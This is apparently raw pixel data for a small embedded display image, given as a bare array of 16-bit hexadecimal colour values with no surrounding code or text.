0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe7fd, 0xefff, 0x42ce, 0xbe1c, 0xffdf, 0xffbe, 0xfffd, 0xf7fc, 0xf7fd, 0xf7fe, 0xffdf, 0xffff, 0xf7df, 0xefff, 0xefdf, 0xe79d, 0xadd8, 0xd6fd, 0xef9f, 0xffff, 0xfffe, 0xf7dd, 0xfffe, 0xf7fe, 0xf7ff, 0xefff, 0xe7ff, 0xefff, 0xa5da, 0x324c, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7fc, 0xefff, 0xbf9f, 0x2c38, 0x0bb6, 0x5538, 0xdfff, 0xfffe, 0xffbe, 0xffdf, 0xffbe, 0xff9d, 0xfffe, 0xfffe, 0xf7fe, 0xffff, 0xfffd, 0xfffe, 0xffde, 0xffdf, 0xffdf, 0xffbf, 0xffbf, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffde, 0xffdc, 0xfffd, 0xf7ff, 0xc6fc, 0x149b, 0x0b54, 0x7d9a, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe,
0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffdc, 0xefff, 0x6dbb, 0x0397, 0x03f9, 0x8edf, 0xdfff, 0xffdd, 0xffde, 0xffff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xffdc, 0xffbd, 0xefff, 0xbfff, 0x34fb, 0x0b74, 0x3b92, 0xe7bf, 0xfffe, 0xfffd, 0xf7fe, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xdfbf, 0x328b, 0xefff, 0xf7ff, 0xffff, 0xffde, 0xfffe, 0xffff, 0x6bef, 0xa5f7, 0x9574, 0xe7df, 0xc73f, 0x6cb6, 0xaedd, 0x74f4, 0xbf1c, 0xcf5f, 0x8518, 0x8dbc, 0xc77f, 0x7455, 0xef7f, 0xffff, 0xf7fe, 0xefff, 0xefff, 0x3aac, 0xd73e, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xefff, 0xc73e, 0x2a6d, 0xf7ff, 0xffdf, 0xffbd, 0xfffe, 0xffde, 0xffdf, 0xffbf, 0xff9d, 0xffbd, 0xfffe, 0xf7fe, 0xf7ff, 0xb5d6, 0xacf6, 0x9cd4, 0xf7df, 0xf7ff, 0xf7fe, 0xffff, 0xffbe, 0xffdf, 0xffbe, 0xffdf, 0xf7ff, 0xf7ff, 0xefff, 0x5b8f, 0xb61a, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xffde, 0xffff, 0xe7bf, 0x33b3, 0x0bb4, 0x1cb7, 0xb7ff, 0xf7ff, 0xffdd, 0xff7b, 0xffbd, 0xf7ff, 0xefff, 0xe7ff, 0xefff, 0xe7ff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xffff, 0xe7ff, 0x7e9f, 0x03d8, 0x22ef, 0x8599, 0xe7ff, 0xefff, 0xffff, 0xffff, 0xffbd, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffd, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0xe7ff, 0x8e5e, 0x1b54, 0x1353, 0x44d8, 0xc77f, 0xe7ff, 0xefff, 0xefff, 0xffff, 0xffde, 0xffde, 0xffdd, 0xff9c, 0xffbd, 0xffdd, 0xfffd, 0xffdd, 0xffbc, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xe7ff, 0xdfff, 0x75bb, 0x2bd5, 0x1352, 0x5cf7, 0xdfff, 0xf7ff, 0xf7de, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xd71d, 0x4aed, 0xf7ff, 0xf7df, 0xffff, 0xfffe, 0xffff, 0xe79f, 0x8d36, 0xc73f, 0x9577, 0xc71f, 0xc73f, 0x74f8, 0x9e7d, 0x5433, 0x9619, 0xcfdf, 0x8579, 0x961d, 0x5c56, 0xae7d, 0xe77f, 0xf7df, 0xf7ff, 0xefff, 0xefff, 0x6bf1, 0xb619, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xbe9b, 0x5bb1, 0xefff, 0xffff, 0xffde, 0xffde, 0xffff, 0xf7ff, 0xf7df, 0xffdf, 0xf7ff, 0xe7ff, 0xdfff, 0xe7ff, 0xefff, 0xf7ff, 0xf7ff, 0xe7ff, 0xd7bf, 0xd79f, 0xe7df, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xefff, 0xefff, 0x9d55, 0x7431, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xeffe, 0xf7fe, 0xffdf, 0xffff, 0xdfff, 0x54f7, 0x0b72, 0x1392, 0x75da, 0xd7ff, 0xf7ff, 0xffff, 0xf7df, 0xffde, 0xfffe, 0xfffd, 0xffdc, 0xffdc, 0xffdd, 0xffdd, 0xffdd, 0xffdd, 0xffdd, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xdfff, 0xb73f, 0x4c98, 0x1b33, 0x2374, 0x9e5b, 0xe7ff, 0xdfdf, 0xf7ff, 0xf7de, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffd, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xfffe, 0xffff, 0xcf5f, 0x4c97, 0x0b76, 0x0b96, 0x4cfa, 0xb75f, 0xe7ff, 0xf7ff, 0xfffe, 0xffde, 0xffbe, 0xffde, 0xffde, 0xffdd, 0xffdc, 0xffdc, 0xfffd, 0xffff, 0xf7ff, 0xdfff, 0xc7df, 0x7e7f, 0x1bf8, 0x0334, 0x2bd4, 0x9e5b, 0xe7ff, 0xefdf, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xdf1d, 0x428b, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xd73e, 0xb69d, 0xae7e, 0x6c75, 0xcf3f, 0xb65c, 0x7475, 0x959a, 0x95da, 0xae5a, 0xbf1d, 0x7d15, 0xb6de, 0xbefe, 0x7c93, 0xe79e, 0xffff, 0xffff, 0xffdf, 0xefff, 0x6bf1, 0xb639, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xcefc, 0x536f, 0xefff, 0xf7df, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xcefd, 0x8539, 0x5c57, 0x963e, 0x7d59, 0x6432, 0xdfdf, 0xe7ff, 0xaebe, 0x3b11, 0x9e5d, 0x6432, 0xd75d, 0xffff, 0xffde, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xa5b7, 0x7411, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xeffe, 0xf7ff, 0xffff, 0xffff, 0xef9f, 0xefff, 0x8e3c, 0x23f5, 0x0bd5, 0x13f7, 0x7e5f, 0xcfbf, 0xf7ff, 0xffff, 0xffdd, 0xfffd, 0xff9b, 0xffdd, 0xfffe, 0xfffe, 0xfffd, 0xfffd, 0xfffe, 0xf7ff, 0xefff, 0xe7ff, 0xbf5f, 0x551a, 0x1396, 0x1b96, 0x4c15, 0xd77f, 0xefff, 0xefff, 0xf7ff, 0xefde, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0xefdf, 0xffdd, 0xff9b, 0xfffe, 0xdfff, 0x7e5f, 0x3479, 0x0b33, 0x2394, 0x4c76, 0x7dba, 0xbf5f, 0xcfdf, 0xdfff, 0xdfff, 0xe7ff, 0xdfff, 0xdfff, 0xe7ff, 0xd7ff, 0xbf7f, 0xa69d, 0x6518, 0x2394, 0x0b75, 0x0b96, 0x659c, 0xc7bf, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7be, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffde, 0xffff, 0xf7ff, 0x4aab, 0xe77e, 0xffff, 0xffde, 0xffff, 0xffff, 0xe73d, 0xcefd, 0xcf1e, 0xcf3e, 0xcedb, 0xf7be, 0xf79e, 0xa556, 0xf7df, 0xcebb, 0xe79d, 0xdf5c, 0xffff, 0xe73d, 0xbdf7, 0xfffe, 0xfffe, 0xffbe, 0xffbf, 0xefff, 0x534e, 0xcebb, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffde, 0xdf3c, 0x21a7, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xf7fe, 0xe7bf, 0x5372, 0x5c17, 0x4bb5, 0xb6de, 0x6c51, 0xcefb, 0x63f0, 0xbedd, 0x4330, 0xcf5f, 0x6bf2, 0xdf1c, 0xfffd, 0xfffc, 0xffdc, 0xffde, 0xffff, 0xf7df, 0x9516, 0x7c74, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf79e, 0xffff, 0xf7bf, 0xf7ff, 0xb75f, 0x5d7b, 0x0b94, 0x0bb5, 0x2c15, 0x5cf8, 0x9e7d, 0xc7df, 0xd7ff, 0xe7ff, 0xe7ff, 0xdfff, 0xdfff, 0xdfff, 0xd7ff, 0xc7ff, 0xb75f, 0x85fa, 0x4c75, 0x1b72, 0x1b94, 0x3437, 0x861d, 0xe7ff, 0xffff, 0xf7df, 0xf7be, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff,
0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0xffff, 0xffdd, 0xffbc, 0xffff, 0xefff, 0xd7df, 0x9e7d, 0x4456, 0x1353, 0x1395, 0x0b96, 0x13f6, 0x3498, 0x451a, 0x453b, 0x453c, 0x451c, 0x3cda, 0x2c38, 0x1bb5, 0x1332, 0x1b11, 0x3c15, 0x6539, 0xc7bf, 0xe7ff, 0xf7ff, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xf7be, 0xffff, 0xfffe, 0xffbd, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xdf7e, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xfffe, 0xffdd, 0xfffd, 0xffde, 0xffff, 0xffff, 0xffff, 0xffde, 0xff9d, 0xffbe, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xffdf, 0xc6bc, 0x428b, 0xf7ff, 0xf7df, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7df, 0xadf8, 0xefdf, 0xffdf, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xf7dd, 0xf7df, 0x532f, 0xbedf, 0x3aaf, 0xd77f, 0x530c, 0xe73c, 0xdf3c, 0xadf8, 0x7433, 0xefff, 0x52ed, 0xe71c, 0xfffd, 0xffdb, 0xffdc, 0xffde, 0xffff, 0xf7df, 0x4acf, 0xbe9c, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xff9f, 0xffff, 0xf7ff, 0xffff, 0xffbf, 0xffbf, 0xf7df, 0xefff, 0xc7bf, 0x5d38, 0x1bd4, 0x1394, 0x0b95, 0x0bb5, 0x1c38, 0x34db, 0x451b, 0x553a, 0x555b, 0x451b, 0x3499, 0x2416, 0x1373, 0x1352, 0x1b73, 0x3c77, 0x967d, 0xdfff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffde, 0xffff, 0xffde, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xf7ff, 0xe7ff, 0xc7bf, 0x867f, 0x555b, 0x3497, 0x1bd4, 0x1393, 0x0b94, 0x0b75, 0x1396, 0x1396, 0x2bf6, 0x54f9, 0x6ddb, 0xbf3f, 0xe7ff, 0xefff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf79e, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7df, 0xe7df, 0x9556, 0x2187, 0xdf3d, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xe79f, 0xefff, 0xd79f, 0xefff, 0xdf9f, 0xffff, 0xf7ff, 0xefff, 0xe7df, 0xefff, 0xdfbf, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xefdf, 0x6bd3, 0x530f, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xfffe, 0xffff, 0xefff, 0xd7ff, 0xa75f, 0x6e1e, 0x3cb8, 0x2c16, 0x1bd6, 0x1b95, 0x1374, 0x1374, 0x1394, 0x23d4, 0x3c96, 0x5d18, 0x867d, 0xb7df, 0xd7ff, 0xefff, 0xfffd, 0xfffd, 0xffff, 0xf7ff, 0xffde, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdd, 0xf7fe, 0xfffe, 0xffff, 0xf7df, 0xf7ff, 0xefff, 0xdfff, 0xdfff, 0xcfff, 0xc7df, 0xc7bf, 0xcfdf, 0xd7ff, 0xd7ff, 0xdfff, 0xe7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xef9f, 0x63d1, 0x5bb2, 0x6414, 0x5c14, 0x5c14, 0x6413, 0x63f2, 0x6412, 0x5c13, 0x53f4, 0x5bf5, 0x63d4, 0x6414, 0x5c13, 0x5413, 0x5bf2, 0x3aed, 0x3b0e, 0x5c74, 0xefdf, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xefdf, 0xbe9c, 0xc69d, 0xc6bc, 0xc6fd, 0xb6dc, 0xb6fe, 0xb6de, 0xbeff, 0xc6db, 0xbebc, 0xb6de, 0xb6ff, 0xaede, 0xb71e, 0xb71e, 0xaebc, 0xae7d, 0x8d9a, 0x6434, 0x326d, 0x7c73, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 